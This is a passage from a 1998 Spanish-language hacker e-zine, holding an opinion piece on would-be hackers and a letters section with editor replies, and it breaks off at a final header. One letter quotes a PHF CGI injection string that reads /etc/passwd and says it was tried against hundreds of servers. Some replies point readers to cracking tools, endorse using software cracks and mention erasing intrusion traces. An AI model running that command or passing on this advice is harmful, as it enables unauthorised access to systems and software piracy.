- Bueno, el caso es que yo no habia conocido a nadie de ese tipo de gente, y
- realmente, no creia que existiera, pero el otro dia, me encontre con uno de
- ellos, que tiene internet y "esta harto del windows 95 y a ver si le paso el
- linux porque es el mejor sistema operativo que hay, por cierto funcionan
- todos los programas de windows en linux?"
-
- AAAAAAAAAAAAAAAAAAARRRRRRRRRRGHHHHHHHHHHHHHHHHHHHHHHHH
-
- Bien, pido disculpas a todos los de Vampire por mi error, ya que gilipollas
- hay en cada calle :(
- Bueno, a que viene todo esto?
- Pues viene a que estoy hasta los cojones de ver a la gente decir "quiero ser
- hacker, se puede hackear con windows ?" y demas polleces.
- Alguien con espiritu de hacker, probara lo nuevo, le gusta investigar, y
- alguien que cumple esto, se merece mi respeto , independientemente de los
- conocimientos que tenga, para mi un hacker es alguien que explora y descubre
- cosas nuevas (Cain, tu SI eres un verdadero hacker), y no un payaso que
- quiere entrar en otro ordenador para demostrar lo cool que es a sus amigos.
- "Me tengo que poner linux para ser un hacker?"
- Cuantos habeis oido/leido esto?
- Supongo que muchos, bien, yo intentare contestar la pregunta:
- -No tienes que ponerte linux para ser un hacker, sino que hasta que no
- indagues por tu cuenta, pongas empeño en satisfacer tu curiosidad, y no en
- "ser un hacker" o en que la gente piense que eres cool, no seras nunca ni un
- intento de hacker.
- Tengo las ideas embotadas, una rabia increible las aprieta todas y las
- atasca en la salida, son tantas que no las puedo expresar con palabras (y si
- le sumamos que me consideran subnormal, pues estamos apañaos).
-
- Lo que intento decir es que un usuario convencido de Windows no puede ser
- nunca alguien a quien le gusta la informatica (o francamente, tiene un gusto
- pesimo), o alguien curioso. Alguien que se resiste a saltar a linux no es
- curioso, y lo que realmente quiero decir es que alguien asi no llegara nunca
- a ser un hacker, sino que perecera en el intento de parecerlo.
- Me suena eso de leer a ciert@/s individu@/s por la IRC decir "ahora estoy
- con windows pq me ha petado el linux" o " es que estoy probando el windows
- 98, pero siempre uso linux" y ese windows parece que dura siempre, o sea,
- que se ve a 1000 leguas que es otro hacker wannabe.
- Probablemente conozcais al personajillo en cuestion, pero hay mas como el,
- que presumen de ser "hackers" y de haber entrado en sitios, cuando realmente
- te das cuenta de que no tienen ni idea, y de que incluso YO se mas que
- ellos. Como alguien asi puede pasearse impunemente por la IRC? Es increible
- la de gilipollas que hay por ahi sueltos, pero bueno.
- Esto simplemente intenta ser algo que les haga desistir antes de darme mas
- asco de la condicion humana en general, puesto que demuestran su egolatria,
- y cuantos egolatras andan por ahi sueltos. Es que lo cojonudo es que no les
- basta con intentar ser algo que nunca seran, sino que se las dan de lo que
- no son.
- Un hacker nace curioso. Yo no soy hacker, pero espero llegar a tener al
- menos cierto conocimiento sobre el tema con el paso del tiempo, y tengo la
- esperanza puesto que he sido siempre muy curioso, pero gente del tipo
- "instalame el linux, ya sabes como lo quiero, preparamelo para tirar a la
- gente y para hackear" te dejan la moral por los suelos.
- Bueno, creo que poco mas que decir queda, creo que mas o menos me he
- expresado bien y mis sentimientos han quedado minimamente reflejados.
-
- Saludo desde aqui a mi novia, que hace posible que siga viviendo, a
- - J.J.F. / Hackers Team -, a Phuck Systems (en especial a Gabber, que
- aguanta tanto con el camion), a Enif, que me enseña cosas, a OiOiO, que me
- aguantan en el grupo, y a #rjn , Vampire BBS, a (casi) toda la gente de
- Fido y Subnet, a Sanity, Nobody, DarkBlack a Koji y a la vaca que rie.
- Muuuuuuuuuuuuuuuuuuuuuuuuuu
-
- -----
- Bueno, eso es todo. Estaba como que mosqueado por este tipo de gente,
- vosotros direis si lo poneis o no ..... :)
-
- See you ... Dr Slump
-
- OiOiO!
-
- <------>
-
- [ Estas cosas pasan y gente inutil ahi por todo el cyberespacio,
- recomendado leer el articulo de Tasslehoff, incluido en este numero,
- para salir de dudas sobre el tema, que es un Hacker realmente :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 30 Sep 1998 17:00:52 GMT
- From: "Diego Jordan Garica Garica" <maoma@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net Subject:
-
- Buenas soy un novicio en esto del hacking y demas y antes de
- empezar quiero estar bien enterado para que no me den
- grandes palos! ni me puteen mucho, en la carta que os
- qescribo queria pediros dos cosas:
-
- 1.- Si me podrias mandar todas vuestras revistas comprimidas
- en un archivo zip
-
- 2.- De dodne me puedo bajar o consegui en unix o linux! si
- acaso se diferencian algo estos dos programas! y ya
- encotrare yo las guias de como usarlos!
-
- Bueno sin nada mas os dejo..espero vuestra contestacion!
-
- <------>
-
- [ Sorry, pero nosotros no enviamos nada a nadie. Linux es distribuido en
- muchas revistas de informatica. Leer FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 25 Sep 1998 16:05:12 GMT
- From: "ZeD" <j172201503@xxxxxxxxxxxxxx>
-
- creo que deberiais comprimir lo po que yo por lo menos no soy capaz de
- bajarlo me lo podriais mandar a este e-mail?
- ZeD@xxxxxxxxxxxxxx
- seria un detalle por cierto muchas gracias por publicar tan pronto los
- articulos que os mande gracias de veras
- byez
-
- http://www.angelfire.com/ak/HACKZED/ZED2.html
- http://come.to/HaCkS-WeB-RiNg
- !!visitalasíí
-
- <------>
-
- [ Pasate por nuestro FTP que alli encontaras el ezine :)
- Dnd, un placer. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 24 Sep 1998 00:50:38 GMT
- From: root <letal@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Libro LINUX
-
- Hola mushashos, vi con agrado que salio mi nota. Les cuento que estoy en
- un proyecto mas ambisioso. Estoy trabajando en un libro de Linux para
- principiantes. En cuanto lo termine que calculo sera en un par de
- semanas se los mando para que lo pongan el su page.
-
- Suerte y hasta la proxima.
-
- <------>
-
- [ Pues estamos ansiosos por ver ese libro sobre Unix, y si necesitas ayuda
- puedes contar con nosotros :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: <delaosapavon@xxxxxxxxxxxxxx>
- Subject: BUSQUEDA DE DRIVERS PARA CD-ROM 32X (CONEXION POR PUERTO PARALELO)
- PARA LINUX áááá
-
- Hola a todos:
-
- Bueno, antes de nada felicitaciones por vuestro trabajo desinteresado en
- informar sobre el mundo hack a la gente que mas o menos no controla mucho el
- tema.
- El motivo del presente mensaje no es mßs que el que me orientΘis acerca de
- una duda enorme que tengo y que gente que estudia informßtica que conozco no
- logra ponerse de acuerdo.
- En primer lugar decir que me interesarφa enormemente tener instalado el
- sistema operativo LINUX en mi ordenador a la vez que el sistema operativo
- WINDOWS 98, pero claro a la hora de decidirme y estar a punto de empezar a
- instalar ambos, es cuando me surge una interrogante sobre problemas que
- tendrΘ ya que mi cd-rom no es interno sino que al ser un portßtil por la
- cosa de que me saliera mßs barato y aprovechar mas el hardware para el
- futuro decidφ hace tiempo comprar un cd-rom (de tipo interno), que se
- conectara al puerto paralelo por medio de una caja adaptadora especial.
- Pero antes de nada paso a daros las caracterφsticas mßs destacadas de mi
- ordenador:
-
- TIPO: NOTEBOOK (portßtil)
- MARCA: ACER EXTENSA 355 MMX
- PROCESADOR: 133 MMX
- RAM: 48 Mg.
- DISCO DURO: 1,6 Gb.
- DISKETERA: 3,5
- CD-ROM: marca SAMSUNG 32X de instalaci≤n interna pero conectado (EN EL
- EXTERIOR) en el puerto paralelo por medio de una caja adaptadora especial
- con fuente de alimentaci≤n propia
- MODEM: TARJETA PCMCIA a 33.6 baudios
- ADAPTADOR DE PANTALLA: CHIPS &TECNOLOGIES 65550 PCI
- TARJETA DE SONIDO: CONTROLADOR YAMAHA OPL3-Sax WDM
- MOUSE: LOGITECH por puerto serie
- Bien, dadas las caracterφsticas, paso a expresaros mis dudas principales...
-
- (1) Tendre problemas al instalar LINUX sin tener drivers para cd-rom por
- puerto paralelo que LINUX reconozca.
- Si existen, donde puedo conseguirlos?.
-
- (2) Cual de los sistemas operativos LINUX es el mas potente en relacion a
- controlar sistemas de seguridad, o tiene mas futuro? GRACIAS...
-
- P.D.: Agradeceria me contestaseis a mi en persona y despues si quereis
- incluis mi consulta en vuestros e-zines.
-
- Atentamente: delaosapavon@xxxxxxxxxxxxxx
-
- <------>
-
- [ Pues no deberias tener problemas de ningun tipo, en caso de tener que
- usar drivers especificos pasate por el website del fabricante, donde
- seguramente podras conseguir drivers.
- Sobre Linux, lo mejor seria que probases tu mismo las diferentes
- variantes, pero si quieres una bastante buena pillate el FreeBSD. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 19 Sep 1998 20:21:57 GMT
- From: <tuliom@xxxxxxxxxxxxxx>
- To: "JJF HACKERS TEAM"
- Subject: Un pedazo
-
- Team,
-
- Me dirijo nos mas, que para pedirles si me pueden obsequiar una
- parte en su revista.
- mi deseo es escribir un articulo donde se hable y explique el lenguaje
- binario y hexadecimal.
- Pues me he dado cuenta de que ustedes lo tratan y conozco personas que leen
- el e-zine que no lo manejan.
- Es solo una pequeña pero concreta explicacion.
- Solo que de ustedes, mas si necesitan algun apoyo solo pidanmelo, que
- por aqui hay unos cuantos hackers pero no se atreven salir.
-
- ah los felicito por el curso de hacking es el mejor praxis que he podido
- ver en lo que al tema refiere.
-
- e.
-
- <------>
-
- [ Pues enviamos ese articulo y te lo ponemos gustosos en el ezine :)
- Thx por la felicitacion. Leer FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 19 Sep 1998 13:54:58 GMT
- From: "LordByte" <amestoy@xxxxxxxxxxxxxx>
- Subject: Posible fallo en el Doawnload del volumen I (Zip)
-
- Pues nada colegas, no se si sera mi descompresorá o no. Pero el volumen uno
- con todos los E-Zines no se puede descomprimir por fallo del archivo y creo
- que habiendolo bajado tres veces y comprobado es suficiente. O lo teneis
- mal, o soy mas torpe que un cisne con botas.
- Bueno pues por mi parte nada mas, enhorabuena por vuestro trabajo y
- adelante.
-
- ááááááááááááááááááááááááá áááááá LordByteDeKyler -:-*]
-
- <------>
-
- [ Tu descompresor no funciona bien o tu no... porque el zip funciona 100%,
- verificado por nuestros tecnicos ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 15 Sep 1998 09:26:07 GMT
- From: <tuliom@xxxxxxxxxxxxxx>
- To: "JJF HACKERS TEAM"
- Subject: Notificacion
-
- Team,
-
- El e-mail es para avisar esto, ustedes se procupan por su web y no parace
- molestarle este tipo de mensaje, como ,estoy de acuerdo les informo.
-
- Tengan cuidado el pimer Crak de su pagina la baje y no funciono,
- estoy utilizando un pentium 166 mhz Winzip 95 y Explorer 4.01 sp1.
-
- Y Praker, hize click en programa para hacer llamadas gratuitas y me dijo
- algo en ingles como: el servidor no contesta o no se pudo establecer
- conexion o error de sintaxis del servidor remoto.
-
- Bien asi que mejoren esto team que ustedes son unicos.
- los mejores por favor no decaigan...........
-
- Estamos dentro
-
- Vikingo Hacker
-
- <------>
-
- [ No todo siempre funciona y mas cuando son crack's o programas de phreak. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 12 Sep 1998 04:34:52 GMT
- From: 444525@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
-
- holas escribia para ver si os interesaba ke escribiera un artikulo sobre
- OTP.
- es otro sistema de hacer login en un ordenador de manera ke el passwd
- sea distinto kada vez ke entras,de manera ke aun snifando el pass
- no te serviria de nada.
- seria un artikulo de simple informacion,no de komo hackearlo.
- La verda es ke aun no lo he visto en ningun sistema pero bueno.
-
- <------>
-
- [ Pues claro, envianoslo y lo pondremos cuanto antes. Leer FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 07 Sep 1998 19:31:27 GMT
- From: David <dtarro@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: hola
-
- HOLA SOY UN CHICO ESPAñOL DE 15 AñOS, ME GUSTARIA QUE ME ENSEñARAIS TODO LO
- QUE SABEIS SOBRE EL HACKING, SE PROGRAMAR MUCHO EN BASIC, CUALQUIER BASIC,
- SE UN POCO DE C, C++, TENGO EL LINUX, NO ME IMPORTA ESTUDIAR CONTESTARME OK?
- E OK?
-
- <------>
-
- [ Pues lo dicho 1001 veces, lee nuestro ezine y todo lo que pase por tus
- manos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 07 Sep 1998 18:58:18 GMT
- From: "Francesco Kywocs" <kywocs@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Aclaraciones... : - )
-
- Hola a todos los del JJF-TEAM,
- bueno, yo soy una persona que esta entrando recien en el tema.
- Y el grupo de ustedes fue el que mas me gusto, y me baje la E-ZINE de
- JJf-TEAM, pero tengo tres problemas:
- Primero, siempre hablan de UNIX, para ser necesario para hackear y como
- no lo tengo queria saber alguna informacion del tipo, la empresa que la
- vende, cual es la mejor version y cosas por estilo.
- Segundo, en la E-ZINE n3 publicaron un log famoso que se uso para el
- hackeo de un server. Mis dudas son, que es un log B-( , y que significan
- esas cinco o seis paginas llenas de palabras, que intento entender sin
- solucion.
- Y mi tercer problemas es que muchas veces dan codigos de fuente que aun
- no entiendo si estan escritos en c o otra cosa, como el que sale en el
- "Curso de hacker 2" en la E-ZINE n2.
- bueno ya dejo de molestarlos y muchas gracias.
- Espero vuestra respuesta para yo tambien aprender.
- ~~>C H A O<~~
- Mi E-Mail es: kywocs@xxxxxxxxxxxxxx
- Se despide KyWoCs...
-
- <------>
-
- [ El Unix no es necesario para ser un Hacker, leer el articulo de Tasslehoff
- para salir de dudas. Un log es un fichero en el cual se guardan los
- distintos sucesos que sucende en el ordenador. Ese log simplemente revela
- la entrada de un Hacker a un sistema informatico y que hizo dentro de el,
- o sea los comandos que ejecuto. Sobre el Codigo fuente normalmente se
- suele poner que tipo de lenguaje es. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Nain <nii97068@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: pregunta
-
- hola,
- acabo de descubrir vuestra revista y me la quiero bajar... todos los n's
- para leerla tranquilamente, sin embargo tengo un problema, siempre que
- intento bajarmela, nunca esta completa... siempre las frases estan cortadas
- por la mitad. que puedo hacer para solucionar esto?
- Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de
- leerla.
-
- Un saludo.udo.
-
- <------>
-
- [ Pasate por nuestro FTP. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "esteban" <esteban@xxxxxxxxxxxxxx>
- Subject: preguntas
-
- hola me llamo sebastian, deseo hacerte unas preguntas:
-
- me he propuesto hackear mi primer web el ultimo dia de este año (1998),
- quisiera que me indiques los pasos para conseguirlo, asi como textos que
- me ayuden a conseguirlo, en espa±ol, ademas trabajo con el windows 98,
- segun tengo entendido esto no es muy util, ahora como puedo cambiarme a
- unix, con que libro puedo aprender a usarlo?, que es un cracker y un
- phreak?, como hackear desde windows 98?, que libro me recomiendas para
- aprender a programar en c?, que necesito para llegar a ser un hacker?,
- como puedo llegar a ser un hacker?.
-
- por ultimo te felicito por la revista es muy interesante
-
- gracias.
-
- <------>
-
- [ Pues suerte y enviamos tus resultados para el ezine :)
- Sobre libros pasate por una buena libreria y decide por ti mismo. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 18 Oct 1998 01:55:08 GMT
- From: Jorge <jlimy@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hackers
-
- Por favor me decis que es una llave PGP?? Muchas gracias, y como
- puedo recuperar el password de mi Bios?
-
- Muchas Gracias.
- Jorge Irrazabal
- Por Favor respondeme a jlimy@xxxxxxxxxxxxxx
-
- <------>
-
- [ PGP (Pretty God Privacy) es un sistema de encriptacion. Para recuperar
- el password de la BIOS pasate por nuestra seccion de CRACK en la cual
- encontaras varias utlidades para ello. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Eduardo" <h82867@xxxxxxxxxxxxxx>
- Subject: Consulta
-
- Hola soy Eduardo de Murcia, y me gustaria hacerte una pregunta. Espero
- que no sea mucha molestia.
-
- La pregunta es:
-
- Si yo me instalo un programa de esos que dan comprando una revista que
- son de esos que tienes 30 dias para probarlos y luego ya no van, una vez
- que se han pasado los 30 dφas que se puede hacer para que siga
- funcionando? yo lo que hago es darle al reloj del ordenador para atrßs y
- asi funciona, pero eso es un coñazo y se que hay personas que borrando
- unas cosas del regedit ya no hace falta hacer eso del reloj y querria saber
- si tu podrφas decirme que es lo que hay que borrar del regedit para
- hacerlo, o si hay alguna otra manera para que esos programas funcionen.
-
- Muchas gracias por todo
-
- Un saludo.
-
- <------>
-
- [ Pues lo de debes hacer es usar un crack siempre y cuando no obtengas
- beneficios economicos por el uso de ese software. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 11 Oct 1998 18:35:23 GMT
- From: "Mr. Aztech" <mr_aztech@xxxxxxxxxxxxxx>
- To: "conde_vampiro@usa.net"
- Subject: Solicitamos su ayuda
-
- Muy buenos dias tengo mi estimado conde vampiro, por medio
- de la presente lo invito para que se presente a declarar a
- la suprema corte de justicia..............
-
- No te creas, perdon por la broma, te escribo o le escribo
- este mail, para solicitarle su ayuda, lo que pasa es que
- nos juntamos aproximadamente 13 personas para hacer un
- articulo sobre iniciacion en hacking, pero este no es uno
- mas sino que esta hecho por gente nueva en esto, llegamos a
- la solucion de que solo asi podriamos satisfacer las dudas
- de la gente, de newbees a newbees, me entiendes, por lo que
- me diriji a usted, por ser conocido en el medio, se que
- normalmente dira, no damos cursos particulares, pero no
- sera ni un curso ni sera para mi, sera para la elaboracion
- de un exelente serie de articulo que posiblemente lleguen
- hasta su zine, por lo que hay le van algunas de nuestras
- dudas:
- 1.-Como hace generalmente alguien del medio para
- introducuirse a una comp. bueno se que suena muy genral, y
- diras, primero estudia basic, pero ya lo se, a lo que me
- refiero es:Primero, consigo informacion sierto? Que
- informacion? Luego investigo sus vulnerabilidades? Cuales
- son las mas comunes?
- Aparte de busgs y exploits e ing? Que otra forma hay de
- colarse?
- Esperamos sus respuestas
- Atte.Aztech
-
- <------>
-
- [ Pues me suena a clase privada y de eso no damos :) Para aprender sobre el
- tema leer este ezine :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 08 Oct 1998 15:33:24 GMT
- From: DrDoom <drdoom@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Saludos de Satan On-Line
-
- Saludos de Satan On-Line y bienvenidos a RC5.
- Nosotros ya llevamos un tiempo en esto. Pero cuantos mßs mejor.
- http://rc5stats.distributed.net/tmsummary.idc?TM=3085085
-
- <------>
-
- [ Por supuesto cuantos mas mejor, pero nosotros preferimos el JJF RC5 Crack
- Team :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Cyborg <cyborg@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
-
- hola, cada vez que intento bajarme el numero 6 de vuestra revista se me
- queda a medias no se porque. Os agradeceria que lo comprimierais en zip
- (aunque siempre decis que no quereis para que lo pueda leer todo el
- mundo y todo eso) o si podeis enviadmelo por email.
-
- gracias :)
-
- <------>
-
- [ Pasate por nuestro FTP. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 06 Oct 1998 09:47:56 GMT
- From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: JJF RC5 Crack Team
-
- Hi!
-
- Te he envio el mail a ti ya que pareces ser el cabecilla :)
-
- He intentado seguir las instrucciones que davais de los pasos que habia
- de seguir. Pero donde pone:
- 4. Al dia siguiente chequea tu estatus y edita tu informacion personal
- en http://www.distributed.net/
-
- 5. En tu informacion personal, afiliate al ID:7281. El grupo de J.J.F. /
- HACKERS TEAM
-
- No se que kereis decir ya ke he mirado en distributed.net i no sale nada
- de editar tu informacion personal.
-
- GraxiaS
-
- P.D. Contestame, ok? (tb estoy interesado en H/P/V/C)
-
- <------>
-
- [ Pues es realmente facil, vuelvetelo a leerte de como se hace otra vez. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 07 Oct 1998 07:48:51 GMT
- From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
-
- H!
-
- Conde
-
- Te he envie un mail ayer pidiendo ayuda sobre el RC5-64 y...
-
- Edit Participant Information
- Password is incorrect
- CPSR distributed.net Electronic Frontier Foundation EPIC Free Software
- Foundation Project Gutenberg Software in the Public Interest
-
- segui tus instrucciones pero no me carbura... :(
- Espero ke me ayudes
- Nos vemos
-
- Spl00t
-
- <------>
-
- [ Claro, el password lo recibes via mail que te envia distributed.net y
- despues pones tu password en tu web personal. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 07 Oct 1998 08:36:14 GMT
- From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Pardon
-
- h!
-
- Perdoname al final lo he conseguido ya ke me hecho un lio de mails xD
- Me gustaria conseguir mas info sobre el grupo y luego si me pudieses
- comentar algo de H/P/V/C
-
- P.D. CONTESTA
-
- Bye Conde Vampiro
-
- Spl00t
-
- <------>
-
- [ Okis :) Bienvenido a JJF RC5 Crack Team. Que grupo, - J.J.F. / Hackers
- Team - o el JJF RC5 Crack Team, ya que son cosas diferentes? ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 06 Oct 1998 09:09:36 GMT
- From: "shelton sol" <librepensador@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: !!
-
- WOW!
- HE ESTADO LEYENDO TU ARTICULOS Y TU PAGUINA
- Y DEJAME DECIRTE QUE HE QUEDADO BOQUIABIERTO
- ES EL 1ER LUGAR DONDE NO LES IMPORTA EL ENSEñAR
-
- YO QUIERO APRENDER!
- PERO NO HE SABIDO BUSCAR,Y AHORA HE ENCONTRADO
- EL LUGAR,PERO TENGO UN PROBLEMA SERIO.NO SE NADA!
- CREI QUE EL ASUNTO HACK SERIA MAS SENCILLO
- LO UNICO QUE SE ES DEL EL HACK DE ICQ,NUKES ETC
- Y MUUUUUY POCO ,NO HE PODIDO GARANTIZAR LA EFECTIVIDAD DE NINGUNO,CREO
- QUE ME HA SALIDO DE CASUALIDAD.
- EN FIN...
- YO QUIERO APRENDER......Y A UD NO LES MOLESTA EL ENSEñAR.....Y NO CREAS
- QUE VENGO A QUE ME PONGAN TODO EN BANDEJA DE PLATA...PERO TE REPITO NO
- SE NADA DE NADA....LEI EL 1ER ARTICULO DE COMO HACKEAR
- EL DE "HACKER TEAM JOURNAL" Y ME HE QUEDADO ATONITO POR LO IMBECIL QUE
- SOY..JEJEJEJEJE......PERO PARA CUANDO TE LLEGUE ESTE MAIL CREO LO PODRE
- COMPRENDER MEJOR....LO HE IMPRIMIDO PARA ESTARLO LEYENDO.
-
- QUIERO APRENDER!
-
- ...YA NO SE QUE MAS DECIR ...SOLO TENGO UNA PALABRA EN MI CABEZA QUE ME
- PERFORA EL CEREBRO
-
- C.U.R.I.O.S.I.D.A.D
-
- EN CASO DE QUE NO ME QUIERAN ENSEñAR...PIDO POR FAVOR CONTESTEN ESTE
- MAIL.
-
- NO SE SI UDs. TENGAN ICQ.PERO POR SI TIENEN HE AQUI MI NUMERO XXXXXXXX
-
- SH
-
- PD.
- SOLO INGRESAN A EL JJF HACKER TEAM ,LOS QUE SABEN?
-
- UNA COSA MAS....COMO PUEDO SABER CUANDO ,QUIEN ENTRA A MI PC CON UN
- TROJAN?
- POR QUE HE INSTALADO UN ANTI TROJAN "TOILET PAPER"
- Y MARCA A CADA MOMENTO UNA VIOLACION EN EL MODULO NO SE QUE...
-
- BUENO ME DESPIDO
-
- <------>
-
- [ Pues para aprender lee con atencion este ezine. En - J.J.F. / Hackers
- Team - solo entran personas con cierto conocimiento por varios motivos
- que no vienen a cuento. Sobre ese detector de troyanos que comentas no
- lo conozco por eso no se decirte. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- De: Desconocido <Pans@xxxxxxxxxxxxxx>
- A: conde_vampiro@usa.net
- Fecha: domingo 4 de octubre de 1998 15:47
-
- oye , necesito que me mandes alguna manera de crackear los logins y
- passwords de los servidores , que no sea la de poner el comando
- (/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd) a la direecion del
- navegador.
- Porque nunca funciona y te aseguro que lo he provado con mas de
- 300 direeciones de internet.
-
- O si tienes algun login y password , para poder telnetear , pasmelo ,
- estaria muy agradecido.
-
- O si tambiien hubiera un programa que lo crackeara tb.
-
- HAAAAAAAAa , y que ........esto si que no creo. Hacker's Utility v 1.02 ,
- este programa funciona bajo windows , y es un programa que trae todas las
- herramientas para poder hackear , desde finger , hasta crackeadores de
- passwords , nt , w95 , *.zip , ecta , osea un poco de todo. Gracias Al menos
- lo he intentado , porque cuando leas este mail , primero , te reiras , luego
- , te cachondearas , y luego pasaras de responderme con otro mail. Seguro
-
- Pero gracias de todas formas.
-
- <------>
-
- [ Pues para informacion lee este ezine. Sorry pero no enviamos ningun tipo
- de informacion de esa clase a los lectores. Para programas crackeadores
- pasate por nuestra seccion de CRACK. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 03 Oct 1998 20:58:14 GMT
- From: "Raphael da Costa Miranda" <treviland@xxxxxxxxxxxxxx>
- To: <"conde_vampiro@usa.net">
-
- hi, conde vampiro!!!!!!!!! congratulations for this page, it is very good
- I don't speak english very well, because Iam from brazilian.
- please, give a e-mail with craks write in portuguese.
- and what's the best crak for peolple fall of the net and find a password
- and the e-mail. I want be a new hacker of this group!!!!!!!!!
- if you write in portuguese or spanish is better!!!!!!!!
-
- <------>
-
- [ Y esto de donde sale?? Nuestro website esta solo en español, por el
- momento :) Cada dia somos mas Internacionales. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 30 Sep 1998 10:11:59 GMT
- From: "MARIA PILAR " <mapii@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: AYUDA
-
- HOLA
-
- SOY COLOMBIANA
-
- MI PREGUNTA ES LA SIGUIENTE... COMO DESEO U OBTENGO EL IP DE ALGUNA PERSONA.
- CUANDO DICHA PERSONA ME MANDA UN MENSAJE YA SEA POR CHAT , ICQ, NETMEETING
-
- LA RAZON ES LA SIGUIENTE ... HAY UNA PERSONA QUE ME BLOQUEA MI COMPUTADOR,
- ME MANDA MENSAJE OBCENO, ME DICE QYE QUIERE BORRAR MI DISCO DURO....NO SE
- QUIEN ES... PERO TENGO UN PROGRAMA WINNUKE95 PARA BLOQUERLO PERO NECESITO
- EL IP DE ESA PERSONA... PERO NO SE OBTENERLO ..ME DICE QUE HAY UN RPOGRAMA
- QUE MUESTRA EL IP DE LA PERSONA CUANDO LE MANDAN MENSAJE, CORREO, CHAT
- AYUDENME...
- GRACIAS....
-
- <------>
-
- [ Pues tiene varias opciones si estas usando un programa de chat,
- simplemente escribe:
-
- /dns nick
-
- Para ICQ existen programas especificos para ello. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 28 Sep 1998 11:22:35 GMT
- From: "Eduardo" <h82867@xxxxxxxxxxxxxx>
- To: <"conde_vampiro@usa.net">
- Subject: consulta
-
- Hola me llamo Eduardo y soy de Murcia. He entrado en vuestra pßgina Web y
- me ha parecido muy interesante y de las pocas de hackers que me han servido
- de algo. Yo soy un novato en el mundo de los hackers y tengo mucha
- informacion que he sacado por ahi pero no me sirve de nada y queria
- preguntarte unas dudas que tengo para ver si tu me las podrias resolver:
-
- 1. Si yo sΘ el password de otro, QuΘ tengo que hacer para entrar en su
- ordenador? o sea donde tengo que poner ese password o que es lo que se
- hace para acceder a su ordenador.
-
- 2. Como se puede uno conectar a internet gratis, porque mi madre me va a
- cortar el cuello ya que las facturas de telefono cada vez bienen mas
- altas.
-
- 3. Si uno no tiene Unix no puede hackear?, es que yo tengo como sistema
- operativo Windows 95.
-
- Espero que no sea mucha molestia. Si por lo que sea no puedes contestarme a
- las preguntas mßndame de todas maneras un mensaje para que yo sepa que has
- recibido mi mensaje. Mi direccion es: h82867@xxxxxxxxxxxxxx
-
- Gracias y hasta otra.
-
- <------>
-
- [ 1- Primero aprende a manejar Internet y como se conectan a otras
- computadoras antes de nada :) 2- Eso se llama Phreaking. 3- Si se puede,
- si se sabe como. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 23 Sep 1998 19:34:25 GMT
- From: j-cool@xxxxxxxxxxxxxx
- To: conde_vampiro@usa.net
- Subject: ayuda
-
- comunicate conmigo necesito ayuda acerca de v....
- nesecito hacer uno
-
- <------>
-
- [ Si quieres algo pues escribe un mail en condiciones pero creo que se por
- donde van los tiros, o sea que no creo que te ayudemos mucho. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 20 Sep 1998 16:55:02 GMT
- From: JAIRO CASAS <gotich@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Un aprendiz!
-
- Hola Conde:
-
- Primero que todo quiero felicitarte por la gran labor que esta realizando tu
- equipo (suena un poco cursi, no?). Ademas quisiera hacerte un par de
- preguntas si no es mucha molestia:
-
- 1) Que metodo que emplearias para hackear una pagina web que no utilice
- servidor unix?
-
- 2) Cuando hablas de TENER CUIDADO a que peligros te refieres?
-
- 3) Para que sirve un dialer/scanner?
-
- 4) Como hago para no dejar pistas en un sistema?
-
- J.C.
-
- <------>
-
- [ 1- Existen muchas maneras. 2- A que te cojan con las manos en la masa.
- 3- Para descubrir ordenadores conectados al telefono. 4- Pues borrar las
- huellas, que realmente es casi imposible. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 13 Sep 1998 19:27:08 GMT
